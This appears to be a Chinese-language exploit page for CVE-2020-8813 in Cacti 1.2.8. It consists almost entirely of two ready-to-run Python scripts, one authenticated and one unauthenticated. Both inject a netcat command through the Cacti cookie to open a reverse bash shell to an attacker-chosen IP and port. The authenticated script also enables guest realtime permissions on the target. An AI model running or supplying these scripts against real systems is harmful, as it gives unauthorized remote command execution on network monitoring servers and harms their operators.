## Cacti v1.2.8 authenticated Remote Code Execution (CVE-2020-8813) ## 简介 > Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。 ## EXP1 需要认证 ```python #!/usr/bin/python3 # Exploit Title: Cacti v1.2.8 Remote Code Execution # Date: 03/02/2020 # Exploit Author: Askar (@mohammadaskar2) # CVE: CVE-2020-8813 # Vendor Homepage: https://cacti.net/ # Version: v1.2.8 # Tested on: CentOS 7.3 / PHP 7.1.33 import requests import sys import warnings from bs4 import BeautifulSoup from urllib.parse import quote warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) != 6: print("[~] Usage : ./Cacti-exploit.py url username password ip port") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] def login(token): login_info = { "login_username": username, "login_password": password, "action": "login", "__csrf_magic": token } login_request = request.post(url+"/index.php", login_info) login_text = login_request.text if "Invalid User Name/Password Please Retype" in login_text: return False else: return True def enable_guest(token): request_info = { "id": "3", "section25": "on", "section7": "on", "tab": "realms", "save_component_realm_perms": 1, "action": "save", "__csrf_magic": token } enable_request = request.post(url+"/user_admin.php?header=false", request_info) if enable_request: return True else: return False def send_exploit(): payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port) cookies = {'Cacti': quote(payload)} requests.get(url+"/graph_realtime.php?action=init", cookies=cookies) request = requests.session() print("[+]Retrieving login CSRF token") page = request.get(url+"/index.php") html_content = page.text soup = BeautifulSoup(html_content, "html5lib") token = soup.findAll('input')[0].get("value") if token: print("[+]Token Found : %s" % token) print("[+]Sending creds ..") login_status = login(token) if login_status: print("[+]Successfully LoggedIn") print("[+]Retrieving CSRF token ..") page = request.get(url+"/user_admin.php?action=user_edit&id=3&tab=realms") html_content = page.text soup = BeautifulSoup(html_content, "html5lib") token = soup.findAll('input')[1].get("value") if token: print("[+]Making some noise ..") guest_realtime = enable_guest(token) if guest_realtime: print("[+]Sending malicous request, check your nc ;)") send_exploit() else: print("[-]Error while activating the malicous account") else: print("[-] Unable to retrieve CSRF token from admin page!") exit() else: print("[-]Cannot Login!") else: print("[-] Unable to retrieve CSRF token!") exit() ``` > Usage: > ![](./img/cacti-final-exploit-code.png) ## EXP2 开启来宾实时图查看权限则不需要认证 ```python #!/usr/bin/python3 # Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution # Date: 03/02/2020 # Exploit Author: Askar (@mohammadaskar2) # CVE: CVE-2020-8813 # Vendor Homepage: https://cacti.net/ # Version: v1.2.8 # Tested on: CentOS 7.3 / PHP 7.1.33 import requests import sys import warnings from bs4 import BeautifulSoup from urllib.parse import quote warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) != 4: print("[~] Usage : ./Cacti-exploit.py url ip port") exit() url = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] def send_exploit(url): payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port) cookies = {'Cacti': quote(payload)} path = url+"/graph_realtime.php?action=init" req = requests.get(path) if req.status_code == 200 and "poller_realtime.php" in req.text: print("[+] File Found and Guest is enabled!") print("[+] Sending malicous request, check your nc ;)") requests.get(path, cookies=cookies) else: print("[+] Error while requesting the file!") send_exploit(url) ``` > Usage: > ![](./img/Cacti-Pre-Auth.png) ## 详细分析以及来源:https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/